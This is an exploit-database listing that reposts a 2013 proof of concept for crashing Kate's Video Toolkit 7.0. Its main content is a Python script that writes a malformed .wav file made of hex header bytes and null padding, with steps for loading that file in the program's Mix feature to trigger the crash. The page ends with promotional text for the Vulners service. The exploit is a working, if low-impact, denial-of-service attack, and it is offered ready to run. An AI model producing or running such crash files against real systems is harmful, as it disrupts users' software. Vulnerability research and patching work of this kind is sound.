Lucene search
K

Kates Video Toolkit 7.0 - .wav Crash (PoC)

🗓️ 16 Jul 2013 00:00:00Reported by ariaratType 
exploitpack
 exploitpack
👁 25 Views

Kates Video Toolkit 7.0 - .wav Crash (PoC) vulnerabilit

Code
# Exploit Title: Kate's Video Toolkit Version 7.0 (.wav) - Crash POC
# Date: 14-07-2013
# Exploit Author: ariarat
# Vendor Homepage: http://fakewebcam.com/Free-Video-Toolkit.asp
# Software Link: http://download.cnet.com/Kate-s-Video-Toolkit/3000-2139_4-10628194.html
# Version: 7.0 (maybe all versions!)
# Tested on: [ Windows XP sp3]
#============================================================================================
# In the Mix section of application : In the left frame add any video file and in right frame
# add kateVideoToolkit.wav file and click Mix then select your path and click OK!
# 
#
#============================================================================================
# Contact :
#------------------
# Web Page : http://ariarat.blogspot.com
# Email    : [email protected]
#============================================================================================

#!/usr/bin/python

junk=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")


file = open("kateVideoToolkit.wav" , "w")
file.write(junk)
file.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jul 2013 00:00Current
0.1Low risk
Vulners AI Score0.1
25